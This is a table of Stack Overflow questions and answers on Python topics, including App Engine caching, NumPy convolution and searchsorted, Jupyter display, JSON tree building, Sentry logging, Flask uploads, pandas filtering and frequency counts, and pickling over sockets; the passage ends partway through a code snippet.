title | question_id | question_body | question_score | question_date | answer_id | answer_body | answer_score | answer_date | tags |
|---|---|---|---|---|---|---|---|---|---|
App Engine serving old version intermittently | 38,741,327 | <p>I've deployed a new version which contains just one image replacement. After migrating traffic (100%) to the new version I can see that only this version now has active instances. However, 2 days later, App Engine is still intermittently serving the old image, so I assume it is serving the previous version. When I ping the domain I can see that the latest version has one IP address and the old version has another.</p>
<p>My question is: how do I force App Engine to serve only the new version? I'm not using traffic splitting either.</p>
<p>Any help would be much appreciated</p>
<p>Regards,
Danny</p>
| 0 | 2016-08-03T10:43:17Z | 38,788,820 | <p>You have multiple layers of caches beyond memcache.</p>
<p>Google's edge cache will definitely cache static content, especially if your app is referenced by your own domain rather than appspot.com.</p>
<p>You will probably need to use some cache-busting techniques.</p>
<p>You can test this by requesting the URL that is presenting old content, but with something like ?x=1 appended to it.</p>
<p>If you then get current content, the edge cache is your problem, and hence the need for cache-busting techniques.</p>
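<p>A minimal sketch of such a cache-busting helper (the helper name and versioning scheme here are illustrative, not part of any App Engine API):</p>

```python
import time

# hypothetical cache-busting helper: appending a changing query
# parameter makes the edge cache treat the URL as a new resource
def busted(url):
    return '%s?v=%d' % (url, int(time.time()))

print(busted('/static/logo.jpg'))
```

<p>In practice you would bump the version string only when the asset actually changes, so repeat visitors still get cache hits.</p>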
| 0 | 2016-08-05T12:03:52Z | [
"python",
"google-app-engine"
] |
Efficient convolution of two images along one axis | 38,741,395 | <p>I have two large grayscale images, either as PIL.Image objects or as NumPy arrays.</p>
<p>How do I do 1d convolution of the two images along one axis? </p>
<p>The best I come up with is</p>
<pre><code>import numpy as np

def conv2(im1, im2, *args):
res = 0
for l1, l2 in zip(im1, im2):
res += np.convolve(l1, l2, *args)
return res
</code></pre>
<p>This works, but it is not extremely fast. Is there a faster way?</p>
<p>Please note that all the 2D convolution functions are probably not relevant since I am not interested in a 2D convolution. I've seen this question on SO before, but I didn't see a better answer than my code. So I'm bumping it again.</p>
| 0 | 2016-08-03T10:46:36Z | 38,741,470 | <p>FFT along one axis, multiply, and inverse FFT along the same axis.
It should be MUCH faster, according to <a href="http://www.dspguide.com/ch18/2.htm" rel="nofollow">this explanation</a>.
<code>scipy.signal.fftconvolve</code> should do the job.</p>
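<p>A sketch of that approach in plain NumPy (in case SciPy is not available); it matches the loop-based <code>conv2</code> from the question up to floating-point error:</p>

```python
import numpy as np

def conv2_fft(im1, im2):
    # full 1-D convolution along axis 1 via FFT, summed over rows --
    # the same result as looping np.convolve over row pairs
    n = im1.shape[1] + im2.shape[1] - 1
    F1 = np.fft.rfft(im1, n=n, axis=1)
    F2 = np.fft.rfft(im2, n=n, axis=1)
    return np.fft.irfft(F1 * F2, n=n, axis=1).sum(axis=0)
```

<p>One FFT per image plus one inverse FFT replaces a per-row Python loop, which is where the speedup comes from.</p>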
| 2 | 2016-08-03T10:49:50Z | [
"python",
"numpy"
] |
What happens during a Jupyter notebook evaluation? | 38,741,451 | <p>I've always thought that Jupyter simply printed out the <code>repr</code> of an object, but that is not the case.</p>
<p>Here is an example. If I evaluate this in a notebook:</p>
<pre><code>obj = type(2)
obj
</code></pre>
<p>I just get: <code>int</code>.</p>
<p>If I do instead</p>
<pre><code>print(obj)
</code></pre>
<p>I get: <code><class 'int'></code>.</p>
<p>So: what is the Python instruction to simulate what the notebook does during the evaluation of a variable?</p>
| 0 | 2016-08-03T10:48:47Z | 38,745,682 | <p>Jupyter/IPython uses a rather complex <a href="https://github.com/ipython/ipython/blob/master/IPython/lib/pretty.py" rel="nofollow">pretty printer</a>. Concerning your example of <code>int</code>, it has a <a href="https://github.com/ipython/ipython/blob/master/IPython/lib/pretty.py#L668" rel="nofollow">printer for classes/types</a>.</p>
<p>Basically what it does is it gets the class' name via <code>cls.__qualname__</code> (py3) or <code>cls.__name__</code> (py2&3) and the module via <code>cls.__module__</code>, and prints them as <code><module.name></code>. For builtins, the module name is silently ignored.</p>
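<p>A minimal sketch of that logic (a simplification for illustration, not IPython's actual code):</p>

```python
def notebook_repr(cls):
    # qualified name plus module, with the builtins module suppressed --
    # roughly what the notebook shows for a bare class expression
    name = getattr(cls, '__qualname__', cls.__name__)
    module = cls.__module__
    if module in ('builtins', '__builtin__', 'exceptions'):
        return name
    return '%s.%s' % (module, name)

print(notebook_repr(int))  # int, not <class 'int'>
```

<p>For non-builtin classes the module prefix is kept, e.g. <code>collections.OrderedDict</code>.</p>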
| 1 | 2016-08-03T13:55:35Z | [
"python",
"jupyter-notebook"
] |
Create JSON tree with unknown root | 38,741,507 | <p>I have the following data created from a minimum spanning tree algorithm:</p>
<pre><code>links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
</code></pre>
<p>I need to convert the data into the following json tree:</p>
<pre><code>{
"id": "Earl",
"name": "Earl",
"children": [
{
"id": "Bob",
"name": "Bob",
"children": [
{
"id": "Leroy",
"name": "Leroy",
"children": [
{
"id": "Harry",
"name": "Harry"
}
]
},
{
"id": "Sam",
"name": "Sam"
}
]
}
]
}
</code></pre>
<p>I have the following script which works except that it adds a root node called 'Root' to the tree which I do not want:</p>
<pre><code>import json
links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
parents, children = zip(*links)
root_nodes = {x for x in parents if x not in children}
for node in root_nodes:
links.append(('Root', node))
def get_nodes(node):
d = {}
d['id'] = node
d['name'] = node
children = get_children(node)
if children:
d['children'] = [get_nodes(child) for child in children]
return d
def get_children(node):
return [x[1] for x in links if x[0] == node]
tree = get_nodes('Root')
print(json.dumps(tree, indent=2))
### output below ###
{
"children": [
{
"children": [
{
"children": [
{
"id": "Sam",
"name": "Sam"
},
{
"children": [
{
"id": "Harry",
"name": "Harry"
}
],
"id": "Leroy",
"name": "Leroy"
}
],
"id": "Bob",
"name": "Bob"
}
],
"id": "Earl",
"name": "Earl"
}
],
"id": "Root",
"name": "Root"
}
</code></pre>
<p>What I need is to not add a fake 'Root' as the root node. The root should simply be any existing node in <code>links</code> which does not have a parent (as per the first json example). In other words, the root of the tree doesn't necessarily have to be Earl, it can be any of the nodes which do not have parents. The tree can then start expanding from there.</p>
<p>Perhaps there's a better algorithm for doing this instead of trying to modify this?</p>
| 0 | 2016-08-03T10:51:31Z | 38,741,619 | <pre><code>tree = get_nodes('Root')
tree = tree['children'][0]
print(json.dumps(tree, indent=2))
</code></pre>
| -1 | 2016-08-03T10:56:36Z | [
"python",
"json",
"minimum-spanning-tree"
] |
Create JSON tree with unknown root | 38,741,507 | <p>I have the following data created from a minimum spanning tree algorithm:</p>
<pre><code>links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
</code></pre>
<p>I need to convert the data into the following json tree:</p>
<pre><code>{
"id": "Earl",
"name": "Earl",
"children": [
{
"id": "Bob",
"name": "Bob",
"children": [
{
"id": "Leroy",
"name": "Leroy",
"children": [
{
"id": "Harry",
"name": "Harry"
}
]
},
{
"id": "Sam",
"name": "Sam"
}
]
}
]
}
</code></pre>
<p>I have the following script which works except that it adds a root node called 'Root' to the tree which I do not want:</p>
<pre><code>import json
links = [("Earl","Bob"),("Bob","Sam"),("Bob","Leroy"),("Leroy","Harry")]
parents, children = zip(*links)
root_nodes = {x for x in parents if x not in children}
for node in root_nodes:
links.append(('Root', node))
def get_nodes(node):
d = {}
d['id'] = node
d['name'] = node
children = get_children(node)
if children:
d['children'] = [get_nodes(child) for child in children]
return d
def get_children(node):
return [x[1] for x in links if x[0] == node]
tree = get_nodes('Root')
print(json.dumps(tree, indent=2))
### output below ###
{
"children": [
{
"children": [
{
"children": [
{
"id": "Sam",
"name": "Sam"
},
{
"children": [
{
"id": "Harry",
"name": "Harry"
}
],
"id": "Leroy",
"name": "Leroy"
}
],
"id": "Bob",
"name": "Bob"
}
],
"id": "Earl",
"name": "Earl"
}
],
"id": "Root",
"name": "Root"
}
</code></pre>
<p>What I need is to not add a fake 'Root' as the root node. The root should simply be any existing node in <code>links</code> which does not have a parent (as per the first json example). In other words, the root of the tree doesn't necessarily have to be Earl, it can be any of the nodes which do not have parents. The tree can then start expanding from there.</p>
<p>Perhaps there's a better algorithm for doing this instead of trying to modify this?</p>
| 0 | 2016-08-03T10:51:31Z | 38,741,774 | <p>Isn't this because you've added Earl as a child of Root? With:</p>
<pre><code>links.append(('Root', node))
print links # [('Earl', 'Bob'), ('Bob', 'Sam'), ('Bob', 'Leroy'), ('Leroy', 'Harry'), ('Root', 'Earl')]
</code></pre>
<p>So now when you run <code>children = get_children(node)</code> for <code>node = 'Root'</code>, you'll get a non-empty list (which is truthy), and the fake root gains children.</p>
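<p>Building on that observation, a sketch that skips the fake root entirely and starts from whichever node never appears as a child (helper functions copied from the question so the snippet stands alone):</p>

```python
links = [("Earl", "Bob"), ("Bob", "Sam"), ("Bob", "Leroy"), ("Leroy", "Harry")]

def get_children(node):
    return [child for parent, child in links if parent == node]

def get_nodes(node):
    d = {'id': node, 'name': node}
    children = get_children(node)
    if children:
        d['children'] = [get_nodes(child) for child in children]
    return d

# the root is any parent that never appears as a child
parents, children = zip(*links)
root = next(p for p in parents if p not in set(children))  # 'Earl' here
tree = get_nodes(root)
```

<p>This assumes the links form a single tree; with several parentless nodes you would get whichever one <code>next</code> finds first.</p>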
| -1 | 2016-08-03T11:03:25Z | [
"python",
"json",
"minimum-spanning-tree"
] |
How do I get the values of pixels in a certain area? | 38,741,551 | <p>Since I am relatively new to programming, I would need a little help with this problem.
I am using SimpleCV with Python 2.7 on a Windows computer.
What I am trying to do is get a (self-written) program to tell me the values of the pixels along a preset line; the most important thing here is the color of each pixel.</p>
<p>I don't really know where to start, since I have only found examples that ask for the value of a single pixel.</p>
<p>It is probably also important to know that I don't want to do this with a still picture but with live video from a webcam, and the preset line will be the radius of an object I will track with the webcam.</p>
<p>So to sum it up: I want to track an object with my webcam and need a program to tell me the color (as a number, so for example "255" for white) of each pixel along the radius line of the tracked object.</p>
<p>This is prewritten code I am currently using for object tracking:</p>
<pre><code>print __doc__
import SimpleCV
display = SimpleCV.Display()
cam = SimpleCV.Camera()
normaldisplay = True
while display.isNotDone():
if display.mouseRight:
normaldisplay = not(normaldisplay)
print "Display Mode:", "Normal" if normaldisplay else "Segmented"
img = cam.getImage().flipHorizontal()
dist = img.colorDistance(SimpleCV.Color.BLACK).dilate(2)
segmented = dist.stretch(200,255)
blobs = segmented.findBlobs()
if blobs:
circles = blobs.filter([b.isCircle(0.2) for b in blobs])
if circles:
img.drawCircle((circles[-1].x, circles[-1].y), circles[-1].radius(),SimpleCV.Color.BLUE,3)
if normaldisplay:
img.show()
else:
segmented.show()
</code></pre>
<p><a href="http://i.stack.imgur.com/AGpIe.jpg" rel="nofollow">here is a snapshot of the tracked object</a></p>
<p>I need the pixel colors along the radius because I want to know how the light intensity decreases going from the center to the rim.</p>
<p>Does anybody have an idea how to approach this problem?
Thank you!</p>
| 2 | 2016-08-03T10:53:22Z | 38,750,457 | <p>Let's say you have the center <code>(x0, y0)</code>. You want to iterate over the pixels on the radius going from <code>(x0, y0)</code> to <code>(x1, y1)</code> which is a point on the circle. </p>
<p>In C++, you would be able to use the <a href="http://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html#lineiterator" rel="nofollow">LineIterator</a> for that purpose. However, I didn't find it for python...</p>
<p>So you can either implement your own LineIterator in Python (or take <a href="http://stackoverflow.com/questions/32328179/opencv-3-0-python-lineiterator">the one made by a nice StackOverFlow contributor</a>) or you could resort to a hideous hack if performance is not a critical issue in your application:</p>
<ul>
<li>Create a black binary mask the size of your image</li>
<li>Draw your line on this mask</li>
<li>Find all non-black pixels using <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.nonzero.html" rel="nofollow">NumPy nonzero function</a>.</li>
<li>You've got the pixels of your line (though they are not ordered)</li>
<li>Order them according to their distance from the center.</li>
</ul>
<p>I reckon that just taking the line iterator I linked to on another StackOverflow question is still the easiest way for you.</p>
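<p>If the center and a point on the rim are known, a plain-NumPy sampling sketch also works (no mask needed, and the pixels come out ordered from center to rim; this assumes the image is a NumPy array, e.g. obtained via SimpleCV's <code>getNumpy()</code>):</p>

```python
import numpy as np

def pixels_along_line(img, x0, y0, x1, y1):
    # sample the segment at roughly one-pixel spacing and round to
    # the nearest integer pixel coordinates
    length = int(np.hypot(x1 - x0, y1 - y0)) + 1
    xs = np.linspace(x0, x1, length).round().astype(int)
    ys = np.linspace(y0, y1, length).round().astype(int)
    return img[ys, xs]  # ordered from (x0, y0) outwards
```

<p>This is a nearest-neighbour approximation of a line iterator; for sub-pixel accuracy you would interpolate instead of rounding.</p>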
| 0 | 2016-08-03T17:47:33Z | [
"python",
"windows",
"opencv",
"tracking",
"simplecv"
] |
Sentry django configuration - logger | 38,741,620 | <p>I am trying to use simple logging and want to send errors/exceptions to Sentry.</p>
<p>I configured Sentry as per the documentation and ran the test successfully on my dev machine (<code>python manage.py raven test</code>).</p>
<p>I added the Logging configuration as in <a href="https://docs.getsentry.com/hosted/clients/python/integrations/django/" rel="nofollow">Sentry documentation</a> to a Django settings</p>
<p>But when I put this code in my view, it doesn't work at all:</p>
<pre><code>import logging
logger = logging.getLogger(__name__)
logger.error('There was an error, with a stacktrace!', extra={
'stack': True,
})
</code></pre>
<p>Maybe I am missing something </p>
<p>Thanks for the help</p>
<pre><code>LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'root': {
'level': 'WARNING',
'handlers': ['sentry'],
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'sentry': {
'level': 'ERROR', # To capture more than ERROR, change to WARNING, INFO, etc.
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
'tags': {'custom-tag': 'x'},
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
}
},
'loggers': {
'django.db.backends': {
'level': 'ERROR',
'handlers': ['console'],
'propagate': False,
},
'raven': {
'level': 'DEBUG',
'handlers': ['console'],
'propagate': False,
},
'sentry.errors': {
'level': 'DEBUG',
'handlers': ['console'],
'propagate': False,
},
},
}
</code></pre>
| 1 | 2016-08-03T10:56:38Z | 38,751,038 | <p>When you call <code>logger = logging.getLogger(__name__)</code>, the logging module <a href="https://docs.djangoproject.com/ja/1.9/topics/logging/#naming-loggers" rel="nofollow">creates a new logger</a> named after your module.</p>
<p>One option is that if you want to log directly to only Sentry, you could use:</p>
<pre><code>logger = logging.getLogger('sentry.errors')
</code></pre>
<p>There are many other configurations for loggers as well as inheritance for loggers on that page in the documentation. </p>
| 0 | 2016-08-03T18:23:19Z | [
"python",
"django",
"logging",
"sentry"
] |
Saving file from post request using Flask only works locally | 38,741,699 | <p><strong>HTML:</strong></p>
<pre><code><form action="/uploadimage" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Submit">
</form>
</code></pre>
<p><strong>Python (Flask):</strong></p>
<pre><code>@app.route('/uploadimage')
def saveImage():
if request.method == 'POST':
imfile = request.files['file']
imfile.save('static/images/myimage.jpg')
# also tried imfile.save('static/images/','myimage.jpg')
</code></pre>
<p>This seems to work fine on my local machine.</p>
<p>When I push my code to the remote repository on Openshift.com, it seems to cause problems. </p>
<p>I can't seem to find the error, I'm not getting any useful feedback from the logs.</p>
<p>Any idea why this might be the case?</p>
| 1 | 2016-08-03T11:00:09Z | 38,741,854 | <p>OpenShift provides a <code>data</code> directory that can be used for persistent storage (see the <a href="https://developers.openshift.com/managing-your-applications/filesystem.html" rel="nofollow">filesystem documentation</a>).</p>
<p>You can get that directory from the <code>OPENSHIFT_DATA_DIR</code> environment variable.</p>
<p>Save your file there instead.</p>
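<p>A hedged sketch of the path handling (the fallback folder mirrors the question's local setup; inside the Flask view you would call <code>imfile.save(upload_target('myimage.jpg'))</code>):</p>

```python
import os

# resolve the persistent directory once; OPENSHIFT_DATA_DIR is set on
# OpenShift, while the static folder serves as a development fallback
DATA_DIR = os.environ.get('OPENSHIFT_DATA_DIR', os.path.join('static', 'images'))

def upload_target(filename):
    # note: werkzeug's secure_filename would be safer for user-supplied
    # names; a plain join is used here for brevity
    return os.path.join(DATA_DIR, filename)
```

<p>Keeping the fallback means the same code runs unchanged both locally and on OpenShift.</p>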
| 1 | 2016-08-03T11:06:59Z | [
"python",
"file",
"flask",
"openshift"
] |
Optimal way for finding 'greatest value less than' in Numpy array | 38,741,718 | <p>I have a sorted numpy array <code>X</code> and also two constants <code>k</code> and <code>delta</code> that are not in <code>X</code>. I would like to find the index corresponding to, the largest value in <code>X</code> less than or equal to <code>k</code> and the value must be within <code>delta</code> of <code>k</code> i.e. I want</p>
<pre><code>max {i | k - delta <= X[i] <= k } (1)
</code></pre>
<p>Note this set may be empty, in which case I will return <code>None</code>. The way I'm currently doing it feels suboptimal, as the first step doesn't take advantage of the fact that <code>X</code> is ordered:</p>
<pre><code># Get the max from the set of indices in X satisfying (1)
idx = np.where((k-delta <= X) * (X <= k))[0].max()
</code></pre>
<p>I'm not sure how clever NumPy can be here, since it doesn't already know <code>X</code> is sorted, so I assume the <code>(k-delta <= X) * (X <= k)</code> step will take longer than necessary. Note we can use the <code>.max()</code> as we know ourselves the array is sorted.</p>
<p>What would be a more optimal way of doing this?</p>
| 2 | 2016-08-03T11:00:53Z | 38,741,916 | <p><a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html" rel="nofollow"><code>Numpy.argmax</code></a> could be usefull for taking advantage of the sorted list.</p>
<pre><code>import numpy as np
np.argmax(X <= k) if k-d < np.argmax(X <= k) < k+d else None
</code></pre>
| 0 | 2016-08-03T11:11:06Z | [
"python",
"arrays",
"performance",
"sorting",
"numpy"
] |
Optimal way for finding 'greatest value less than' in Numpy array | 38,741,718 | <p>I have a sorted numpy array <code>X</code> and also two constants <code>k</code> and <code>delta</code> that are not in <code>X</code>. I would like to find the index corresponding to, the largest value in <code>X</code> less than or equal to <code>k</code> and the value must be within <code>delta</code> of <code>k</code> i.e. I want</p>
<pre><code>max {i | k - delta <= X[i] <= k } (1)
</code></pre>
<p>Note this set may be empty, in which case I will return <code>None</code>. The way I'm currently doing it feels suboptimal, as the first step doesn't take advantage of the fact that <code>X</code> is ordered:</p>
<pre><code># Get the max from the set of indices in X satisfying (1)
idx = np.where((k-delta <= X) * (X <= k))[0].max()
</code></pre>
<p>I'm not sure how clever NumPy can be here, since it doesn't already know <code>X</code> is sorted, so I assume the <code>(k-delta <= X) * (X <= k)</code> step will take longer than necessary. Note we can use the <code>.max()</code> as we know ourselves the array is sorted.</p>
<p>What would be a more optimal way of doing this?</p>
| 2 | 2016-08-03T11:00:53Z | 38,742,146 | <p>One efficient approach to leverage the sorted order would be with <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.searchsorted.html" rel="nofollow"><code>np.searchsorted</code></a> -</p>
<pre><code>def largest_within_delta(X, k, delta):
right_idx = X.searchsorted(k,'right')-1
if (k - X[right_idx]) <= delta:
return right_idx
else:
return None
</code></pre>
<p>Sample runs to cover various scenarios -</p>
<pre><code>In [216]: X
Out[216]: array([ 8, 9, 33, 35, 36, 37, 44, 45, 71, 81])
In [217]: largest_within_delta(X, 36, 0) # this k is already in array
Out[217]: 4
In [218]: largest_within_delta(X, 36, 1) # shouldn't choose for next one 37
Out[218]: 4
In [220]: largest_within_delta(X, 40, 3) # Gets 37's index
Out[220]: 5
In [221]: largest_within_delta(X, 40, 2) # Out of 37's reach
</code></pre>
<p><strong>Runtime test</strong></p>
<pre><code>In [212]: # Inputs
...: X = np.unique(np.random.randint(0,1000000,(10000)))
...: k = 50000
...: delta = 100
...:
In [213]: %timeit np.where((k-delta <= X) * (X <= k))[0].max()
10000 loops, best of 3: 44.6 µs per loop
In [214]: %timeit largest_within_delta(X, k, delta)
100000 loops, best of 3: 3.22 µs per loop
</code></pre>
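<p>For comparison, the same idea with the standard library's <code>bisect</code>, which also guards the edge case where <code>k</code> falls below every element (so <code>right_idx</code> would otherwise be -1):</p>

```python
import bisect

def largest_within_delta_bisect(X, k, delta):
    # index of the rightmost element <= k, provided it is within delta of k
    i = bisect.bisect_right(X, k) - 1
    if i >= 0 and (k - X[i]) <= delta:
        return i
    return None

X = [8, 9, 33, 35, 36, 37, 44, 45, 71, 81]
print(largest_within_delta_bisect(X, 40, 3))  # 5
```

<p>Both <code>bisect_right</code> and <code>searchsorted</code> are O(log n), so either beats the O(n) boolean-mask approach on large arrays.</p>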
| 2 | 2016-08-03T11:21:35Z | [
"python",
"arrays",
"performance",
"sorting",
"numpy"
] |
Delete row in column when value in column is a string | 38,741,814 | <p>I have the following dataframe:</p>
<pre><code> MATERIAL KW_WERT NETTO_EURO TA
0 B60ETS 0.15 18.9 SDH
1 B60ETS 0.145 18.27 SDH
2 B60ETS 0.145 18.27 SDH
3 B60ETS 0.15 18.9 SDH
4 B60ETS 0.15 18.9 SDH
5 B60ETS 0.145 18.27 SDH
6 B60ETS 0.15 18.9 SDH
7 B60ETS 3.011 252.92 DSLAM/MSAN
8 B60ETS 3.412 429.91 DSLAM/MSAN
9 B60ETS 0.9 113.4 DSLAM/MSAN
10 B60ETS 0.281 23.6 DSLAM/MSAN
11 B60ETS 0.078 9.83 DSLAM/MSAN
12 B60ETS 0.107 13.48 DSLAM/MSAN
13 B60ETS 0.192 KW DSLAM/MSAN
14 B60ETS 0.007 KW PSTN
15 G230ETS 0.3 46.05 SONSTIGES
</code></pre>
<p>How can I filter for rows where the value in the column <code>NETTO_EURO</code> is a string and delete them?</p>
<p>The point is that the raw data I get includes some errors, and I can't sum up a column that has string data in it. For now the first solution is to delete those rows; later I will try to fix it differently.</p>
<p>Thank you for your help.</p>
<p>Damian</p>
| 1 | 2016-08-03T11:05:03Z | 38,741,853 | <p>You can use mask with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.to_numeric.html" rel="nofollow"><code>to_numeric</code></a> and <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.notnull.html" rel="nofollow"><code>notnull</code></a> with <a href="http://pandas.pydata.org/pandas-docs/stable/indexing.html#boolean-indexing" rel="nofollow"><code>boolean indexing</code></a>:</p>
<pre><code>print (pd.to_numeric(df.NETTO_EURO, errors='coerce').notnull())
0 True
1 True
2 True
3 True
4 True
5 True
6 True
7 True
8 True
9 True
10 True
11 True
12 True
13 False
14 False
15 True
Name: NETTO_EURO, dtype: bool
print (df[pd.to_numeric(df.NETTO_EURO, errors='coerce').notnull()])
MATERIAL KW_WERT NETTO_EURO TA
0 B60ETS 0.150 18.9 SDH
1 B60ETS 0.145 18.27 SDH
2 B60ETS 0.145 18.27 SDH
3 B60ETS 0.150 18.9 SDH
4 B60ETS 0.150 18.9 SDH
5 B60ETS 0.145 18.27 SDH
6 B60ETS 0.150 18.9 SDH
7 B60ETS 3.011 252.92 DSLAM/MSAN
8 B60ETS 3.412 429.91 DSLAM/MSAN
9 B60ETS 0.900 113.4 DSLAM/MSAN
10 B60ETS 0.281 23.6 DSLAM/MSAN
11 B60ETS 0.078 9.83 DSLAM/MSAN
12 B60ETS 0.107 13.48 DSLAM/MSAN
15 G230ETS 0.300 46.05 SONSTIGES
</code></pre>
<p>If has old version of pandas use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.convert_objects.html" rel="nofollow"><code>convert_objects</code></a>:</p>
<pre><code>print (df[df["NETTO_EURO"].convert_objects(convert_numeric=True).notnull()])
MATERIAL KW_WERT NETTO_EURO TA
0 B60ETS 0.150 18.9 SDH
1 B60ETS 0.145 18.27 SDH
2 B60ETS 0.145 18.27 SDH
3 B60ETS 0.150 18.9 SDH
4 B60ETS 0.150 18.9 SDH
5 B60ETS 0.145 18.27 SDH
6 B60ETS 0.150 18.9 SDH
7 B60ETS 3.011 252.92 DSLAM/MSAN
8 B60ETS 3.412 429.91 DSLAM/MSAN
9 B60ETS 0.900 113.4 DSLAM/MSAN
10 B60ETS 0.281 23.6 DSLAM/MSAN
11 B60ETS 0.078 9.83 DSLAM/MSAN
12 B60ETS 0.107 13.48 DSLAM/MSAN
15 G230ETS 0.300 46.05 SONSTIGES
</code></pre>
| 1 | 2016-08-03T11:06:50Z | [
"python",
"python-3.x",
"pandas"
] |
Pickle Key error "Y" using socket | 38,741,884 | <p>I am trying to send a dictionary to my client and it is fine on the server end, but when it gets to unpickling the dictionary it comes up with the error <code>KeyError: 'Y'</code>.</p>
<p>Why?</p>
<p>Here is my code:</p>
<p>client.py:</p>
<pre><code>import socket, pickle
s = socket.socket()
s.connect(("localhost", 10000))
def userDump():
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
print userDump()
s.close()
</code></pre>
<p>server.py:</p>
<pre><code>import pickle, socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = 'localhost'
port = 10000
s.bind((address, port))
s.listen(5)
while True:
c, clientaddress = s.accept()
c.send("You're Connected")
d = c.recv(1024)
if d == "userdump":
u = {"hello":"hi", "hi":"hello"}
print u
c.send(pickle.dumps(u))
c.close()
</code></pre>
| 0 | 2016-08-03T11:08:59Z | 38,742,013 | <p>It certainly doesn't help that the "You're connected" message is being concatenated with the pickle in your client. Removing that <code>send</code> from the server code appears to make your program work correctly.</p>
| 1 | 2016-08-03T11:15:12Z | [
"python",
"sockets",
"pickle"
] |
Pickle Key error "Y" using socket | 38,741,884 | <p>I am trying to send a dictionary to my client and it is fine on the server end, but when it gets to unpickling the dictionary it comes up with the error <code>KeyError: 'Y'</code>.</p>
<p>Why?</p>
<p>Here is my code:</p>
<p>client.py:</p>
<pre><code>import socket, pickle
s = socket.socket()
s.connect(("localhost", 10000))
def userDump():
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
print userDump()
s.close()
</code></pre>
<p>server.py:</p>
<pre><code>import pickle, socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = 'localhost'
port = 10000
s.bind((address, port))
s.listen(5)
while True:
c, clientaddress = s.accept()
c.send("You're Connected")
d = c.recv(1024)
if d == "userdump":
u = {"hello":"hi", "hi":"hello"}
print u
c.send(pickle.dumps(u))
c.close()
</code></pre>
| 0 | 2016-08-03T11:08:59Z | 38,742,034 | <p>The pickle protocol is version dependent. Could it be that you use different Python / pickle versions on client and server? In that case select a low protocol version explicitly as explained in the <a href="https://docs.python.org/3.5/library/pickle.html" rel="nofollow">docs</a>.</p>
<p>Alternatively use JSON or something called <a href="https://pypi.python.org/pypi/Pyro4" rel="nofollow">Pyro</a></p>
<p>(O, and, indeed, first make the correction suggested by holdenweb...)</p>
| -1 | 2016-08-03T11:16:29Z | [
"python",
"sockets",
"pickle"
] |
Pickle Key error "Y" using socket | 38,741,884 | <p>I am trying to send a dictionary to my client and it is fine on the server end, but when it gets to unpickling the dictionary it comes up with the error <code>KeyError: 'Y'</code>.</p>
<p>Why?</p>
<p>Here is my code:</p>
<p>client.py:</p>
<pre><code>import socket, pickle
s = socket.socket()
s.connect(("localhost", 10000))
def userDump():
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
print userDump()
s.close()
</code></pre>
<p>server.py:</p>
<pre><code>import pickle, socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = 'localhost'
port = 10000
s.bind((address, port))
s.listen(5)
while True:
c, clientaddress = s.accept()
c.send("You're Connected")
d = c.recv(1024)
if d == "userdump":
u = {"hello":"hi", "hi":"hello"}
print u
c.send(pickle.dumps(u))
c.close()
</code></pre>
| 0 | 2016-08-03T11:08:59Z | 38,742,153 | <p>Your function <code>userDump()</code> should be corrected as:</p>
<pre><code>def userDump():
d = s.recv(1024)
s.sendall("userdump")
d = s.recv(1024)
return pickle.loads(d)
</code></pre>
<p>In your code you receive <code>"You're Connected"</code> in <code>d</code> and you are trying to unpickle it.</p>
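<p>More generally, TCP is a byte stream, so distinct <code>send</code> calls can arrive glued together or split apart. A common fix is length-prefixed framing, sketched below (the function names are illustrative):</p>

```python
import pickle
import socket
import struct

def send_msg(sock, obj):
    # 4-byte big-endian length header, then the pickled payload
    data = pickle.dumps(obj)
    sock.sendall(struct.pack('!I', len(data)) + data)

def recv_exact(sock, n):
    # loop until exactly n bytes have been read
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError('socket closed mid-message')
        buf += chunk
    return buf

def recv_msg(sock):
    (length,) = struct.unpack('!I', recv_exact(sock, 4))
    return pickle.loads(recv_exact(sock, length))
```

<p>With framing, the greeting and the pickled dictionary can never be concatenated into one <code>recv</code> result.</p>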
| 0 | 2016-08-03T11:21:59Z | [
"python",
"sockets",
"pickle"
] |
Calculating the frequency of each row in Pandas DataFrame | 38,741,914 | <p>Suppose I have given datasets:</p>
<pre><code>Sr.No|Query
-----
1. a
2. a
3. b
4. b
5. a
</code></pre>
<p>I want the following result :</p>
<pre><code>Sr.No | Query | Frequency
1. a 3
2. a 3
3. b 2
4. b 2
5. a 3
</code></pre>
<p>Please note that the duplicates should not be removed.</p>
| 3 | 2016-08-03T11:10:53Z | 38,741,972 | <p>You can use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.core.groupby.GroupBy.transform.html" rel="nofollow"><code>transform</code></a> with <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.core.groupby.GroupBy.size.html" rel="nofollow"><code>size</code></a>:</p>
<pre><code>df['Frequency']= df.groupby('Query')['Query'].transform('size')
print (df)
Sr.No Query Frequency
0 1.0 a 3
1 2.0 a 3
2 3.0 b 2
3 4.0 b 2
4 5.0 a 3
</code></pre>
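<p>An equivalent alternative maps each value onto its <code>value_counts</code> total, which keeps the duplicates just the same:</p>

```python
import pandas as pd
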